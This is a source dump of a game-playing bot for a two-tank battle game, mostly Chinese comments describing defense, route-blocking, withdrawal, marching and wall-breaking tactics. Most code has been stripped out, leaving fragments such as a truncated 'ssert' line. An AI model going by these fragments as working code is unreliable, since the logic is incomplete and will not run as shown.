如果我方可以射击,对方不能射击,那么按照之前的经验,对方下回合会移动 # 这个时候尝试击杀 # # 这回合可以射击,则改为射击 # 如果带有这个标记,那么这回合就不要射击了,等待敌人打完这回合, # 下回合才有可能击杀 5ce50cd9d2337e01c7a6e45a # 否则就考虑反身射击 # 尝试击杀敌军 # 均不能射击,那么将判定为没有风险。那就一起移动 # 正常情况下选择堵路 #---------------------- # 模仿敌人的移动方向 # 认为在堵路 # 否则等待 #{ END 'decision/single/overlapping.py' }# #{ BEGIN 'decision/single/base_defense.py' }# 主动防守基地 --------------------- 现在没有和敌人正面相遇,首先先处理一种特殊情况 在敌人就要攻击我方基地的情况下,应该优先移动,而非预判击杀 这种防御性可能会带有自杀性质 若敌人当前回合正面对我方基地 ---------------------------- 1. 敌人当前回合炮弹冷却,下回合射向我方基地,如果我方坦克下一步可以拦截,那么优先移动拦截 2. 敌人当前回合可以射击,我方坦克下一步可以拦截,那么自杀性拦截 3. 敌人当前回合炮弹冷却,下回合射向我方基地,而我方坦克需要两步才能拦截,那么自杀性拦截 若敌人下一回合可以面对我方基地 ---------------------------- 1. 此时敌人必定可以射击,如果我方坦克在这一步可以优先移动到拦截的位置,那么优先移动 # # 敌人当前回合面向基地 # # 敌方可以射击 # 此时不再面向我方基地,为正确路线 # 敌方不可射击 # 敌方不能射击,我方尝试移动两步 # 一步防御成功 # 尝试两步拦截 # 需要先预判是否合理 # 两步拦截成功 # # 敌人下一回合可能面向基地 # # 敌人移动一步后面向我方基地 # 我方优先移动可以阻止 #{ END 'decision/single/base_defense.py' }# #{ BEGIN 'decision/single/behind_brick.py' }# 适用于在墙后和敌人僵持时的情况 # 准备破墙信号 #-------------------------- # 触发条件: # # 1. 对应于双方对峙,我方开好后路后触发某些条件强制破墙 # 2. 对方刚刚从墙后移开,我方存在后路,这个时候强制破墙 # # 收到这个信号的时候,首先检查是否可以闪避 # # 1. 如果可以闪避,就返回可以破墙的信号 # 2. 如果不可以闪避,就返回这回合准备后路的信号 # # 只考虑攻击路径上的敌人 _undoRevertTurns = 0 while oppTank is None: # 对应于敌方刚离开的那种触发条件 # 可能存在多轮回滚,因为别人的策略和我们的不一样! # 给别人回滚的时候必须要考虑多回合! map_.revert() _undoRevertTurns += 1 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1) # # 墙后敌人并不一定处于攻击路径之后! 5ce3d1c0d2337e01c7a554e3 # 在这种情况下应该取消考虑这种情况 # # 用于下回合触发 # 用于下回合触发 # 重新设置这个敌人! # 准备凿墙 # 两边均不是土墙 # 不能处理,只好等待 # 可以闪避,那么回复团队一条消息,下一步是破墙动作 for _ in range(_undoRevertTurns): map_.undo_revert() # 必定回复一个信号 # # 准备回退以制造二打一的局面 # # 只考虑攻击路径上的敌人 # ?? # 存在风险,也就是想要夹击的敌人有炮弹,那么就先等待一回合 # 必定回复一个信号 #{ END 'decision/single/behind_brick.py' }# #{ BEGIN 'decision/single/follow_enemy_behind_brick.py' }# 跟随墙后敌人的逻辑 ----------------- 如果上回合敌人和我方隔墙僵持,然后敌人向两侧移动,为了防止敌人从旁边的墙突破, 这里添加一个主动跟随的逻辑,假如对方这回合破墙,那么我方这回合就会出现在对方墙后, 这样对方就无法进攻,甚至可以为我方进攻创造机会 5ce57677d2337e01c7a7c1ff # 上回合墙后有人 # 找到墙后敌人 # 理论上不会存在? 
# 敌人上回合从墙后闪开 # 尝试跟随敌人上回合的移动行为 # 确保跟随后还隔着墙 5ce90a90d2337e01c7abcd07 # 否则何必要跟随 ... # # 将动作连续化,如果对方连续移动,那么可以考虑跟随 # # 有可能要多回合回滚 # 理论上一定会找到敌人 # 上回合一定跟随移动 # 确保敌人在贴着墙移动,否则就不必继续跟随了 # 两次移动方向或相反 # 尝试跟随敌人上回合行为 #{ END 'decision/single/follow_enemy_behind_brick.py' }# #{ BEGIN 'decision/single/withdrawal.py' }# 主动回撤逻辑 ------------- 如果我方大逆风,那么主动回防基地 具有一个持久性的记忆标签 KEEP_ON_WITHDRAWING 带有这个标签的 player 在决策的时候,比 WithdrawalDecision 优先级高的决策应该以 WITHDRAW 状态为优先 带有 WITHDRAW 持久标记的 player 决策必定会在此处终止,否则就要取消这个标记和状态, 让后续的决策继续进行 # 一个测试用的 const,设为 False 则取消一切和 WITHDRAW 相关的决策 获得基地两个对角线位置的两个防御坐标 更加危险的防御点,被认为是距离敌人更近的防御点 # 距离敌人更近的点根据危险性 为了防止出现这样一种情况: 5ce9154fd2337e01c7abd81f 以及这样一种情况: 5cea5d38d2337e01c7ad8418 ---------------------------------- 1. 假如我方这回合移动,而敌人下回合通过非射击行为,可以面向我方基地(射击行为的话,下回合对方炮弹冷却, 对基地暂时不造成威胁),如果我方这回合选择不移动可以阻止它,那么就选择停止 2. 假如我方这回合射击,而敌人下回合通过非射击行为,可以面向我方基地,那么就选择停止 3. 假如我方先破一墙,对方出现在后面,那么就算是有威胁 # 事实上应该不会出现 # 先保存所有可能行为,为了防止模拟我方行为后,射击能力被重置 # 我方执行一步后,对方面对基地 # 现在不模拟我方行为,然后同样模拟对方行为,看对方是否面对我方基地 # 敌人上回合没有面对我方基地 # 当敌人尚未面对我方基地 # 我方射击一步后,敌人面对我方基地 # 不安全的 # 其他情况均认为安全 Withdraw 下的 try_make_decision # 如果等待了两回合,对方两回合均为射击那么视为安全 # 糟糕的设计!如果后续需要更改,那么需要在再删掉这个状态 获得趋近守卫点 (x2, y2) 的下一个行为 # 这个必定能找到路! # 其实是可以确保一直停留在基地附近的? # stay/realAction # # 首先,检查带有持久化 WITHDRAW 标签的 player # 该回合是否还需要真正的延续这个标签 # # 一种情况是考虑是否应该 # # 实际评估不是 WITHDRAW # 假如对方上回合被击杀,那么我方大概率会触发侵略模式? # 留给其他 decision 处理 # # 一种情况是考虑上回合是否击杀了一个人 # # 二打一的局势,此时 oppBattler 为剩下一个敌人 # 我比队友距离更远 # 一样远 # 我比队友理基地更远,那么让队友防御 # 如果还是一样远 ... # 避免两者同时强攻,那么就让先判断的队友进行强攻 # 留给其他 decision 处理 # 这个状态一旦出现,就添加标记 # # (inserted) 不要轻易从中线撤退,应该想一下是否可以堵路 # # y = [2, 6] # 先判断 stay # 不需要判断安全性? # # 1. 如果上回合已经到达基地附近,那么优先移动到基地对角线的位置等待 # 2. 必要时改变守卫的位置 # # TODO: # 如果能直接到达守卫点,那应该考虑一下直接到达 ... 而不要先把基地的墙凿了 # # # 已到达基地附近,但是未到达守卫点,尝试移向守卫点 # # 为处在对角线防御位置 # 高优先级触发 # # 已经到达守卫点,判断是否需要移向另一个守卫点 # # 距离敌人更近的点根据危险性 # 设置为等待 # 其他情况下继续等待 # 如果不将我视为钢墙 # 如果将我视为钢墙 # TODO: # 如果 route2 和 route3 距离差很大,那么可以选择不动 # # 对方找不到进攻路线,那就相当于我方把路堵住了? # 这个不可能的吧 # 我方防御路线比地方进攻路线领先值 # 至少要快一步 # 阻塞程度最小的优先 # 到达基地就等待了 # 尽量找一条不是停留的路? # 没有一个合适的行为? 
# 那就随便来一个把 ... # stay # 存在风险敌人就能判定是因为敌人阻挡? #{ END 'decision/single/withdrawal.py' }# #{ BEGIN 'decision/single/active_defense.py' }# 主动防御策略 ----------------------- 不要追击敌人,而是选择保守堵路策略! 1. 对于路线差为 2 的情况,选择堵路,而非重叠 2. 如果自己正常行军将会射击,那么判断射击所摧毁的块是否为敌人进攻路线上的块 如果是,则改为移动或者停止 # 前两回合结束前不要触发主动防御! # 从路线距离分析确定最近敌人 # 避免过早进入 DEFENSIVE 状态 #---------------------------- # 取消主动防御轮数限制? # 前期以侵略性为主 # 如果是距离为 2 #---------------- # 由于两者相对的情况在前面的 encount enemy 时会被处理,这里如果遇到这种情况 # 那么说明两者是出于不相对的对角线位置。 # # 必定能找到路! # # 此时应该考虑自己是否正处在敌方的进攻的必经之路上 # 如果是这样,那么考虑不动,这样最保守 # 否则在合适的回合冲上去挡路 # # 判定方法是将己方坦克分别视为空白和钢墙,看对方的最短路线长度是否有明显延长 # 如果有,那么就堵路 # # 需要能够正确应对这一局的情况 5cd356e5a51e681f0e921453 # TODO: # 事实上这一局敌方不管往左还是往右,都是8步,因此这里会判定为不堵路,所以就会主动重叠 # 但是,左右两边的走法是不一样的,往左走必定会走不通,左右的8步并不等价,这里需要还需要 # 进一步的分析路线的可走性 # # TODO: # 事实上这样不一定准确,因为如果敌人前面有一个土墙,那么他可以先打掉土墙 # 然后继续前移,这样敌方就可以选择继续往前移动 # # 路线增长,说明是必经之路 # # 虽然路线长度相同,但是路线的可走性不一定相同,这里先衡量对方当前路线的可走性 # 如果本回合我方等待,敌人向前移动,那么敌方只有在能够不向原来位置闪避的情况下 # 才算是我堵不住他的路,否则仍然视为堵路成功 5cd356e5a51e681f0e921453 # # 保存原始坐标 # ssert Action.is_move(enemyMoveAction) # 应该是移动 # 此时敌方与我相邻 # 这种情况才是真正的设为 True 否则不属于此处应当考虑的情况 # 如果敌人移动后可以不向着原来的位置闪避 # 此时相当于不能堵路 # # 否则自己不处在敌方的必经之路上,考虑主动堵路 # # 对方这回合不能射击 # 或者对方等待了两个回合,视为没有危险 # 不宜只考虑一回合,否则可能会出现这种预判错误的情况 5cdd894dd2337e01c79e9bed # 移动后我方坦克位于敌方坦克进攻路线上 # 我方的移动后仍然不会挡敌人的路?? # 中路优先 # 如果移动后与敌人相邻 # 否则,就是和敌人接近的连个方向上均为不可走的! 
# 那么让后续的逻辑进行处理 if ( # 可能是主动防御但是为了防止重叠而等待 ( player.has_status_in_previous_turns(Status.ACTIVE_DEFENSIVE, turns=1) and player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) and Action.is_stay(player.get_previous_action(back=1)) ) or # 可能是为了防止被杀而停止 ( player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED) and Action.is_stay(player.get_previous_action(back=1)) ) ): oppPlayer = Tank2Player(oppBattler) if Action.is_stay(oppPlayer.get_previous_action(back=1)): # 对方上回合在等待 # # 但是遇到这种情况就非常尴尬 5cd356e5a51e681f0e921453 # # 需要再判断一下是否有必要上前堵路 # _shouldMove = False x1, y1 = oppBattler.xy x2, y2 = _route[1].xy # 目标位置 enemyAttackRoute = oppBattler.get_shortest_attacking_route() if (x2, y2) in enemyAttackRoute: # 下一步移动为进攻路线 enemyMoveAction = Action.get_move_action(x1, y1, x2, y2) with map_.simulate_one_action(oppBattler, enemyMoveAction): for enemyDodgeAction in oppBattler.try_dodge(battler): # 如果敌人上前后可以闪避我 route1 = oppBattler.get_shortest_attacking_route() with map_.simulate_one_action(oppBattler, enemyDodgeAction): route2 = oppBattler.get_shortest_attacking_route() if route2.length <= route1.length: # 并且闪避的路线不是原路返回 _shouldMove = True break # # 真正的值得堵路的情况 # if _shouldMove: x1, y1 = battler.xy x2, y2 = _route[1].xy # 跳过开头 moveAction = Action.get_move_action(x1, y1, x2, y2) if map_.is_valid_move_action(battler, moveAction): # 稍微检查一下,应该本来是不会有错的 player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction # # 否则选择不要上前和敌人重叠,而是堵路 # player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # endif # 转向寻找和敌方进攻路线相似度更高的路线 #-------------------------------------- # # 允许 3 步延迟 # 相似度最大的路线 # # 判断下一步是否可以出现在敌人的攻击路径之上 5cd31d84a51e681f0e91ca2c #------------------------------- # 如果可以,就移动过去 # # 获得移动后的坐标 # 是否符合移动的条件 # 打破僵局 # 当回合可以射击 # 上回合也可以射击 # 说明敌人大概率不打算攻击我 # # 符合了移动的条件 # 但是还需要检查移动方向 # 不能向着远离敌人的方向移动,不然就会后退 ... 
5cd33351a51e681f0e91da39 # # 向着远处移动了 # 添加一个限制,必须要移动后出现在敌人的附近 # 否则约束过弱,容易导致前期乱跑的情况 5cd39434a51e681f0e924128 # # # 判断自己的下一步是否为敌人开路 #------------------------- # 如果自己下一个行为是射击,然后所射掉的块为敌人进攻路线上的块 # 那么将这个动作转为移动或者停止 # # TODO: # 这个动作是有条件的,通常认为是,块就处在敌人的周围,我将块打破后 # 敌人有炮,我不能马上移到块的,这样就可能让敌人过掉,在这种情况下避免开炮 # # TODO: # 不能被过掉的情况不准确!只有不再在同一直线的情况下才需要判断 5ce444a8d2337e01c7a5eaea # 如果两者处在同一条直线,假如双方都射击,那么下一回合就直接相遇,并不会出现被对方过掉的情况 # # 下一步将会打掉一个墙 # 打掉的 Brick 在敌人进攻路线上 # # 再尝试模拟,是否会导致上述情况 # # 一回合假设我方射击,敌人任意行为 # 二回合假设我方移动,敌人射击 # 自动判断是否可射击 # 然后这回合我方坦克挂了 # 移动/停止 # 否则直接采用主动防御的进攻策略 # # TODO: # 这是个糟糕的设计,因为这相当于要和下方的进攻代码重复一遍 # # 只有在我方地盘的时候才触发 # # 首先实现禁止随便破墙 # # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # # # 敌人下一步可能移到墙后面 # # 此时如果直接出现在墙的后面 # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 这段代码复制自下方的侵略模式 #-------------------------- # 即将停留第二回合 # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 # 当回合可以射击,并且我上回合停留,因此敌人上回合可以射击 # 说明敌人大概率不打算攻击我 # 否则标记为防止被杀,用于上面的触发 #{ END 'decision/single/active_defense.py' }# #{ BEGIN 'decision/single/marching.py' }# 行军策略 ------------------------- 当身边没有和任何敌人正面遭遇的时候,尝试寻找最佳的进攻行为 1. 进攻 2. 不会主动破墙 3. 遇到僵局,会在指定回合后自动打破僵局 4. 遇到有风险的路径导致需要停止不前的,会考虑寻找相同长度但是安全的路径,并改变方向 5. ...... # (inserted) 强攻信号 #------------------------- # 应该是移动行为,且不需检查安全性 # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" # 一定能找到路 # 可能出现这种队友堵住去路的及其特殊的情况! 5cdde41fd2337e01c79f1284 # 不必别人领先的情况下,就不要 delay 了 ... # 允许和对手同时到达,但由于我方先手,实际上应该是领先的 # # 在我方地盘时,优先从边路攻击 # 到达敌方场地,优先从中路攻击 # # 5cde18e7d2337e01c79f47c8 # # isMiddleFirst = battler.is_in_enemy_site() # # TODO: # 不要采用中路优先的搜索,否则容易打出狭路,然后因为敌人对自己存在威胁而停止不前! 
# 5ce48c2fd2337e01c7a6459b # # 如果我方两架坦克都到达了敌方基地,处于双方均不回头的局面 5cec9157641dd10fdcc5f30d # 那么可以采用 x-axis-first 以更好地触发团队合作,因为它优先选择拆除 x = 4 的墙 # # 如果双方都处在对方基地,并且都没有遭遇到敌人 # 想要使用 x-axis-first 必须首先 middle-first # # 在我方基地的时候,不要评估敌人对攻击路线的干扰,而是优先采用边路优先的搜索。这样可能和敌人相撞, # 但至少可以平局。如果在我方基地就开始衡量敌人的干扰,那么敌人绕边路的时候我方可能会选择中路, # 这种情况下可能会被另一边的敌人干扰,出现一牵二的局面。 # # 还可能遇到一种很糟糕的情况,就是我方为了绕开敌人而选择了一条比最短路线要长的路,这种情况下 # 可能我方最终就会落后与对方,这样如果还绕过了敌人,那就根本没法拦截了,到最后肯定是输。 # # TODO: # ---------------------- # 这个影响对于bot的侵略性影响非常大,因为很容易因此和对方平局。并且边路分拆难以触发合作拆家, # 进攻优势会被削弱。也许可以一牵二的情况进行特判,其他情况继续绕路? # 也许需要根据情况进行判定,毕竟一牵二的情况和绕路拆家结果反而赢了的情况是有的,而且似乎都不少见 # # 这回合的进攻路线 # 将会返回的行为,默认为 STAY # # 对于最优方案的缓存,用于判断次优行为是否合理 # 没事老回头实在是太蠢了! 5cee6790641dd10fdcc8de2c # 有路也不是这样走啊! # # 第一条路线给出的进攻行为 # 第一条路线下玩家真实决策的而行为 # 第一个进攻行为是否因为受到敌人拦截而受阻 # 缓存第一次决策时的状态 # 当前是否为第一条路径 # 缓存第一条路径 # # TODO: # 仅仅在此处综合考虑路线长度和敌人的影响,有必要统一让所有尝试获得下一步行为的函数都 # 以于此处相同的方式获得下一攻击行为 # # for route in battler.get_all_shortest_attacking_routes(): # 目的是找到一个不是停留的动作,避免浪费时间 # for route in sorted_routes_by_enemy_effect( # battler.get_all_shortest_attacking_routes(delay=allowedDelay), player ): # for route in sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst), # key=lambda r: estimate_enemy_effect_on_route(r, player) ): # 缓存已经考虑过的结果 # 引入 idx 用于判断是第几个路线 # 首先清除可能出现的状态,也就是导致 stay 的状况 ????? # 恰好过了第二回合 # 确保所有 continue 语句设置的 status 都可以在这里被捕获 # 缓存行为和路线 # 缓存攻击行为,避免重复判断 # 下一步是停留,就没必要过多判断了 # 缓存真实判断 # debug_print(player, attackAction, realAction) # 存在风险 # 特殊情况,如果下下回合就要打掉对方基地 # 那就没必要乱跑了 5cddde4dd2337e01c79f0ba3 # # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 在上方的主动防御模式里还有一段和这里逻辑基本一致的代码 #-------------------------- # 即将停留第二回合 # # 判断敌人不会攻击我的标准 # # 1. 敌人当前回合可以射击 # 2。 敌人上回合也可以射击 # 3. 敌人上回合与上上回合的行为相同,也就是已经连续移动了两个回合或者等待了两个回合 # 这个补充条件非常重要 5cde71a4d2337e01c79f9a77 # # TODO: # 这个条件仍然不对!! 
5ce220add2337e01c7a38462 # # 当回合可以射击 # 上回合也可以射击 # 说明敌人大概率不打算攻击我 # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 # TODO: # 此处需要检查是否应该预先破墙 5ce21ba2d2337e01c7a37dbd # # 原本的移动,现在变为停留 #------------------------ # 停着就是在浪费时间,不如选择进攻 # # # 如果当前回合射击可以摧毁的对象中,包含自己最短路线上的块 # 那么就射击 # # 为 block 对象,该回合可以射击 # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 # # 如果能摧毁的是基地外墙,仍然选择攻击 # 因为在攻击后可能可以给出更加短的路线 # # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 # # 如果不能摧毁和地方基地周围的墙,但是可以摧毁与自己中间相差一格的墙,那么仍然选择攻击 # 这种情况多半属于,如果当前回合往前走一步,可能被垂直方向的敌人射杀,因为不敢前进 # 在多回合后,我方可能会主动突破这种僵持情况。在我方主动向前一步的时候,敌人将可以 # 射击我方坦克。如果前方有一个空位,那么我方坦克就可以闪避到前方的空位上,从而继续前进。 # 如果这个位置本来是个砖块,但是没有预先摧毁,我方坦克在突击后就只能选择原路闪回, # 那么就可能出现僵局 # 因此这里预先摧毁和自己相差一格的土墙,方便后续突击 # # 如果是防御状态,那么不要随便打破墙壁! 5cd31d84a51e681f0e91ca2c # # 防御性无效 # 只有在对方基地的时候才有效 # 距离为 2 相当于土墙 # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 # 如果为射击行为,检查是否是墙后敌人造成的 # 额外指定一下,确保是这个敌人造成的 # # 强攻行为,如果出现这种情况,双方均在拆家,但是对方坦克下一步有可能移到我方坦克后方 # 对于这种情况,大部分人应该选择继续进攻,同时绕开麻烦,因为进攻的时候还考虑击杀敌人 # 一般会延误战机。这种情况下应该判定为敌方坦克不会来尝试击杀我方坦克,那么就继续攻击 # 5ce57074d2337e01c7a7b128 # # 双方均在对方基地方时才触发 # # 现在尝试看对方是否能够找到一条不受到我方坦克影响的最短攻击路线 # 通常应该是可以找到的 # # 缓存已经考虑过的行为 # 说明找到了一条可以躲开我方坦克的路线 # # 否则停止不前 # 此时必定有 riskyEnemy # # 可能触发 Signal.PREPARE_FOR_BREAK_BRICK 和 Signal.FORCED_MARCH # TODO: 这个状态是普适性的,希望在上面的各种情况中都能补全 # 缓存状态,仅仅在因为防止被杀而停留的状态下缓存,其他情况不算 # 结束时常规地要复制一次,避免没有第二条路的情况 # 停留动作,尝试继续寻找 # 对于移动行为,有可能处于闪避到远路又回来的僵局中 5cd009e0a51e681f0e8f3ffb # 因此在这里根据前期状态尝试打破僵局 #---------------------------------- # 说明上回合刚闪避回来 # 然后这回合又准备回去 # TODO: # 此处是否有必要进一步检查两次遇到的敌人为同一人? # # # 首先考虑前方相距一格处是否有土墙,如果有,那么就凿墙 5cd009e0a51e681f0e8f3ffb # # 这个 brick 必须不在我方基地! # 真实体现 #player.add_label(Label.ALWAYS_DODGE_TO_LONG_WAY) # 如果能够运行到这里,就添加这个标记 # 预判一步,如果下一步会遇到敌人,并且不得不回头闪避的话,就考虑先摧毁与自己中间相差一格的墙(如果存在) # 类似于主动防御的情况 # # 如果已经和基地处在同一直线上 # 如果移动后不再面对敌人基地,那么就不移动 # 防御性无效 # 只有在敌方地盘时才有效! 
# 如果下回合能射掉一个墙 # 没有敌人根本不需要预判 # 只有 route1 为 delay = 0 的选择才可比较 # 如果存在着一种闪避方法使得闪避后线路长度可以不超过原线路长度 # 那么就不破墙 # 现在尝试破墙 # 距离为 2 的土墙 # 不检查安全性 # 需要射击但是暂时没有炮弹,那么就等待 # # 考虑这样一种情况,如果下回合我可以射击且对方可以射击,我们中间差两个墙,如果我方不射击 # 对方可能就会压制过来,这样就很亏,所以当双方都有炮且两者间差一个墙的时候,我方优先射击 # 5cea974dd2337e01c7add31f # # 前方是墙 # 现在墙后无人 # 现在前面还有墙 # 此时墙后有人 # 此时对方也可以射击 # 那么我方这回合优先开炮,避免随后和对方进入僵持阶段 # # move action 在这之前必须要全部处理完! # # # 侵略模式下优先射击,如果能够打掉处在最短路线上的墙壁 #------------------- # 能够打掉一个处于最短路线上的土墙 # 注意:这里修改了 realAction 方便后续判断,但是这是非常不好的一个做法 # # 禁止随便破墙!容易导致自己陷入被动! # # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # # 墙后有人,不能射击 # 否则就等待 #--------------- # 设置这个敌人! # # 敌人下一步可能移到墙后面 # # 此时如果直接出现在墙的后面 # 仍然将其设置为墙后敌人 # # 并不是一定不能破墙,需要检查敌人是否真的有威胁 # # 1. 和队友相遇的敌人可以忽略 5ce209c1d2337e01c7a36a0a # 2. 和队友隔墙僵持的敌人可以忽略(这种情况非常有可能) 5ce5678ed2337e01c7a79ace # 3. 对手正在和队友僵持的敌人可以忽略 5ce70df6d2337e01c7a98926 # 4. 如果对手威胁我的位置他曾经到过,那么可以忽略 5ce266a1d2337e01c7a3cc90 # # 考虑两人相对 # 被队友牵制的敌人可以忽略 # 考虑是否隔墙僵持 # 和队友隔墙僵持的敌人可以忽略 # 考虑是否和队友僵持 # 模拟一步后和队友相遇 # # 如果敌人威胁我的位置它曾经到过(这种情况实际上包含了第三点) # # 先找到威胁我方坦克的位置 # (x, y) #assert _enemyRiskySite is not None # 一定会找到? # # 不在敌人的进攻路线上,这样才算是已经走过,否则可以认为他在晃墙? # 5cec129e4742030582fac36d # # 回滚成功则 True # 他曾经到过这个地方 # 不能在这种情况下破墙! 5cec129e4742030582fac36d # 先尝试 shoot 转 move #--------------- # 否则 stay # # (inserted) 打破老是回头的僵局 # # 尝试向着两边闪避 5ced9540641dd10fdcc79752 # # 好吧 ... 不加这个可能过不了自动测试 -> TODO: 也许我们不应该再替对方决策一遍? # 限制为严格地不在我方基地 # 可走的路线,那么直接闪避 # 那么就打破了这个状态 # 并将闪避方向作为这回合的攻击方向 # 否则继续攻击 # endfor # endwith # 缓存攻击路线 # # 现在判断是否是第一条路线,并考虑它的合理性! # # 乱回头实在是太蠢了! 5cee6727641dd10fdcc8dd96 -> 5cee6e3d641dd10fdcc8e8cf # # 选的是非第一条路线 # 不选一条的原因是为了防止被杀 # 这条路线给出的行为是移动 # 第一个进攻路线也是移动 # 于是这条路线给出的移动方向是远离进攻路线的方向! # 这种情况下应该停下来! 
# 找到一个侵略性的行为 # # 否则返回 STAY # 此处查找是否和第一条路线的决策结果一致,如果一致,那么就将第一次决策下的各种状态还原 # #{ END 'decision/single/marching.py' }# #{ BEGIN 'decision/team/individual.py' }# 两人分别单独地进行决策,团队决策的起点 #{ END 'decision/team/individual.py' }# #{ BEGIN 'decision/team/vital.py' }# 将关键的个人决策设置为团队决策,个人决策即为团队最优决策, 低优先级决策者不可对其进行协调 # 准备为防御基地牺牲 # 准备为防御基地堵路 # 准备攻击敌方基地 # 准备击杀敌人 # TODO: 牺牲攻击局,可能需要考虑一下闪避 5ccca535a51e681f0e8c7131 # 将个人决策设置为团队决策 #{ END 'decision/team/vital.py' }# #{ BEGIN 'decision/team/leave_teammate.py' }# 和队友打破重叠的团队决策 己方两个坦克重叠在一起这种事情实在是太愚蠢了 ... # 有队友已经挂了,那就不需要考虑这个情况了 # 一人移动一人非移动,那么是合理的 # 两人均为移动,但是两人的移动方向不一样,这样也是可以的 # 两者都拥有团队命令 # 两个队员可以认为是一样的,因此任意选择一个就好 # 保存更改 #{ END 'decision/team/leave_teammate.py' }# #{ BEGIN 'decision/team/forced_attack.py' }# 强攻信号 ---------------- 为了解决单人决策行为过于保守的问题 在攻击过程中,一些所谓的有潜在危险的行为,实际上一点危险都没有,但是为了防止出错,就原地等待, 这反而是贻误了战机,甚至最后还要匆忙转攻为守,实际上根本就防不住 所以应该根据战场形势分析潜在风险究竟有多大,如果实际上是没有风险的,就发动强攻信号,让攻击者 保持进攻,而不去过分规避风险 如下情况是值得发动强攻信号的: 1. 侵略/僵持模式,出现了停止前进,防止被杀的状况 - 敌人正在和队友交火,敌人此回合可以射击,但是下回合必定会攻击队友 - 敌人正在和队友隔墙僵持,敌人可以射击,但是他并不攻击,多半是为了拖延战局 - 敌人正在和队友重叠,敌人可以射击,但是他一直在等待队友决策 2. 侵略/僵持模式,出现了停止前进,两方均越过了中线,对方明显不会回头,不想防你 # 侵略模式 # 僵持模式 # 但是出现了停止前进 # 等待行军 # 是为了防止被杀 # 说明是因为没有弹药? # 考虑队友和敌军的情况 #debug_print(player.get_risky_enemy()) #debug_print(teammate.get_risky_enemy()) # 敌人正在和队友交火 #------------------ # 这种情况直接前进 # # 说明对方正准备和队友交火 # 敌人正在和队友隔墙僵持 #---------------------- # 如果他们僵持了超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友僵持,或者故意在拖时间 # # 那么可以直接进攻 # # 僵持超过一回合 # 已经等待了一回合 # 敌人正在和队友重叠 #---------------------------- # 如果他们重叠不动超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友重叠 # # 那么可以直接进 # # 僵持超过一回合 # 已经等待了一回合 # 双方均跨过中线 #----------------------------- # 那么不再反击,直接进攻? 
# # TODO: # 存在着一攻一守的 bot # # 建议强制行军 #{ END 'decision/team/forced_attack.py' }# #{ BEGIN 'decision/team/break_brick.py' }# 主动破墙的团队决策 ----------------- 乱破墙是不可以的,单人不要随便破墙,但是有条件的破墙是可以的 # 当前回合处于等待状态 # 墙后有人造成的 # 因此等待行军 #and not player.has_status(Status.DEFENSIVE) # 不要让防御性的队友随意破墙 # 目前有弹药 # and self.has_status_in_previous_turns(player, Status.WAIT_FOR_MARCHING, turns=1) # 改成一有机会就先留后路 # 触发的条件是一方隔墙,队友因为这两个人的僵持受到牵制 #---------------------------------------------------- # 僵持方先破墙,留好后路 #---------------------- # 下一步准备凿墙 # 至此该队员决策完成,等待它这回合凿墙 # elif signal3 == Signal.READY_TO_BREAK_BRICK: # 否则将受到破墙信号,开始判断是否符合破墙条件 # 获得墙后敌人 # 必定有风险敌人 # playerIdx = idx # teammateIdx = 1 - idx # 发现敌人和队友相遇,立即破墙 这个两个触发已经不再需要了 5ce217e8d2337e01c7a3790c # TODO: # 这种情况挺难遇到的,而且一旦遇到一般都为时过晚 # 应该要模拟地图预测一下,提前开一炮 # if (teammate.has_status(Status.WAIT_FOR_MARCHING) # 队友等待 # and self.has_status_in_previous_turns(teammate, Status.WAIT_FOR_MARCHING, turns=1) and teammate.has_status(Status.PREVENT_BEING_KILLED) # 队友是为了防止被杀 ): teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() # 墙后敌人 if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: # 两者受到同一个敌人牵制,那么发动破墙信号 _shouldBreakBrick = True elif ( teammate.has_status(Status.AGGRESSIVE) or teammate.has_status(Status.STALEMENT) ): teammateAction = returnActions[ teammateIdx ] if (Action.is_move(teammateAction) # 确保队友动作为移动 and teammate.has_status(Status.KEEP_ON_MARCHING) # 队友正在行军 ): # 尝试模拟下一回合的队友状态,并让队友重新决策,查看他的状态 with map_.simulate_one_action(teammate, teammateAction): action4, _ = teammate.make_decision() if (teammate.has_status(Status.WAIT_FOR_MARCHING) and teammate.has_status(Status.PREVENT_BEING_KILLED) ): # 这个时候队友被阻拦 teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: _shouldBreakBrick = True # 如果是因为对面墙的坦克在阻拦,那么马上破墙 # # 如果遇到对手准备和队友对射 5cd364e4a51e681f0e921e7a # 那么考虑直接破墙 # # 敌方当前回合应该必定会还击,否则就失去了防御的意义 # 
